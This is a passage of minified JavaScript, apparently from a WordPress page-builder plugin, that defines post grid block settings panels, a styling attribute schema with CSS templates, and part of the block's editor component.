Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}],exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}],exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exStyle:["imgMargin","imageScale","imgWidth","imgHeight"],exSettings:["imgMargin","imageScale","imgWidth","imgHeight"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},62308:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!1},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},metaKey:{type:"string",default:"custom_meta_key",style:[{depends:[{key:"queryOrderBy",condition:"==",value:"meta_value_num"}],0:{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}}]},queryNumber:{type:"string",default:5,style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2"]},{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titleAnimation:{type:"string",default:""},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"30",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout5"}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a"},{depends:[{key:"titleShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a, \n          {{ULTP}} .ultp-block-item:nth-child(2) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:nth-child(2) .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout5"}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title a"},{depends:[{key:"titleShow",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-block-item:not(:first-child):not(:nth-child(2)) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child):not(:nth-child(2)) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square"},imgAnimation:{type:"string",default:"roateLeft"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-overlay"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"flat",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaAuthor","metaDate"]'},showSmallCat:{type:"boolean",default:!0},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:10,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},column:{type:"string",default:"2",style:[{depends:[{key:"layout",condition:"==",value:["layout1","layout2"]}],selector:"{{ULTP}} .ultp-block-row { grid-template-columns: repeat({{column}}, 1fr); }"},{selector:"{{ULTP}} .ultp-block-row { grid-template-columns: repeat({{column}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-gap: {{columnGridGap}}; }"}]},overlayHeight:{type:"object",default:{lg:"450",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-empty-image { width: 100%; object-fit: cover; height: 100%; } \n          {{ULTP}} .ultp-layout5 .ultp-block-item .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout3 .ultp-block-item .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout4 .ultp-block-item .ultp-block-content-overlay {height: calc({{overlayHeight}}/2);} \n          {{ULTP}} .ultp-layout1 .ultp-block-item .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout2 .ultp-block-item .ultp-block-content-overlay {height: calc({{overlayHeight}}/2.5);} \n          {{ULTP}} .ultp-layout1 .ultp-block-item:first-child .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout2 .ultp-block-item:first-child .ultp-block-content-overlay {height: calc({{overlayHeight}}/1.5);} \n          {{ULTP}} .ultp-block-row { min-height: {{overlayHeight}}; } \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-image img, \n          {{ULTP}} .ultp-block-row .ultp-block-item:first-child .ultp-block-empty-image { width: 100%; object-fit: cover; height: 100%; } \n          @media (max-width: 768px) {\n            {{ULTP}} .ultp-block-item .ultp-block-content-overlay .ultp-block-image img, \n            {{ULTP}} .ultp-block-content-overlay .ultp-block-empty-image { height: calc( {{overlayHeight}}/2 ); min-height: inherit; }\n          }"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:"0"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"loadMore"},...(0,o.t)(["advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],["metaKey","queryNumber"],[{key:"queryNumPosts",default:{lg:5}},{key:"pagiAlign",default:{lg:"left"}},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"readMoreColor",default:"#fff"}]),V4_1_0_CompCheck:a.O,...(0,i.b)({defColor:"#fff"})}},67879:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(38219),r=l(62308),s=l(18781);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-3/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-3.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid3.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-3")]},edit:n.Z,save:()=>null})},12975:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(6544);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useRef:T,useState:_,useEffect:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=T(null),[l,B]=_(f.Ti),[U,M]=_(null),{setAttributes:A,name:H,attributes:N,context:j,className:Z,isSelected:O,clientId:R,attributes:{blockId:D,currentPostId:z,excerptLimit:F,metaStyle:W,metaShow:V,catShow:G,showImage:q,metaSeparator:$,titleShow:K,catStyle:J,catPosition:Y,titlePosition:X,excerptShow:Q,imgAnimation:ee,imgOverlayType:te,imgOverlay:le,metaList:oe,metaListSmall:ae,showSmallCat:ie,readMore:ne,readMoreText:re,readMoreIcon:se,overlayContentPosition:pe,showSmallBtn:ce,showSmallExcerpt:ue,metaPosition:de,showFullExcerpt:me,layout:ge,columnFlip:ye,titleAnimation:be,customCatColor:ve,onlyCatColor:he,contentTag:fe,titleTag:ke,showSeoMeta:we,titleLength:xe,metaMinText:Te,metaAuthorPrefix:_e,titleStyle:Ce,metaDateFormat:Ee,authorLink:Se,fallbackEnable:Pe,imgCropSmall:Le,imgCrop:Ie,vidIconEnable:Be,notFoundMessage:Ue,previewImg:Me,advanceId:Ae,paginationShow:He,headingShow:Ne,filterShow:je,paginationType:Ze,navPosition:Oe,dcEnabled:Re,dcFields:De,querySticky:ze,V4_1_0_CompCheck:{runComp:Fe}}}=e;function We(e){B({...l,selectedDC:e})}function Ve(){B({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Ge(e){B({...l,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e),M("setting")}function qe(e){B((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function $e(){l.error&&B({...l,error:!1}),l.loading||B({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(N)}).then((e=>{B({...l,postsList:e,loading:!1})})).catch((e=>{B({...l,loading:!1,error:!0})}))}C((()=>{(0,f.oA)(),$e()}),[]),C((()=>{const t=R.substr(0,6),l=L(I(R));(0,a.qi)(A,l,z,R),(0,y.h)(e),D?D&&D!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||A({blockId:t})):(A({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&A({queryType:"archiveBuilder"}))}),[R]),C((()=>{const e=t.current;(0,b.o6)()&&0===N.dcFields.length&&A({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,N)&&($e(),t.current=N),e.isSelected!==O&&O&&(0,f.gT)(Ge,qe)):t.current=N}),[N]),C((()=>{ze&&A({queryNumber:"layout4"==ge?"4":"3"})}),[ze]);const Ke={settingTab:U,setSettingTab:M,setAttributes:A,name:H,attributes:N,setSection:Ge,section:l.section,clientId:R,context:j,setSelectedDc:We,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){We(e),qe("dc_group")}};let Je;if(D&&(Je=(0,m.Kh)(N,"ultimate-post/post-grid-4",D,(0,a.k0)())),Me&&!O)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Me});C((()=>{O&&N.previewImg&&A({previewImg:""})}),[e?.isSelected]);const Ye=x({...Ae&&{id:Ae},className:`ultp-block-${D} ${Z}`,onClick:e=>{e.stopPropagation(),Ge("general"),qe("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:Ke,selected:l.toolbarSettings}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:Ke})),(0,o.createElement)(g.Z,{include:[{type:"query",exclude:["queryNumber","queryNumPosts"]},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-grid-4",key:"layout",options:[{value:"layout1",img:"assets/img/layouts/pg4/l1.png",label:__("Layout 1","ultimate-post"),pro:!1},{value:"layout2",img:"assets/img/layouts/pg4/l2.png",label:__("Layout 2","ultimate-post"),pro:!0},{value:"layout3",img:"assets/img/layouts/pg4/l3.png",label:__("Layout 3","ultimate-post"),pro:!0},{value:"layout4",img:"assets/img/layouts/pg4/l4.png",label:__("Layout 4","ultimate-post"),pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[Fe?"exclude":"dep"]:a.N2}],store:Ke}),(0,o.createElement)("div",Ye,Je&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Je}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ne||je||He)&&(0,o.createElement)(r.m,{attributes:N,setAttributes:A,onClick:()=>{Ge("heading"),qe("heading")},setSection:Ge,setToolbarSettings:qe}),function(){const e=`${fe}`,t=(e,t)=>(0,b.o6)()&&Re&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:De,settingsOnClick:(e,t)=>{e?.stopPropagation(),qe(t)},selectedDC:l.selectedDC,setSelectedDc:We,setAttributes:A,dcFields:De});return l.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add 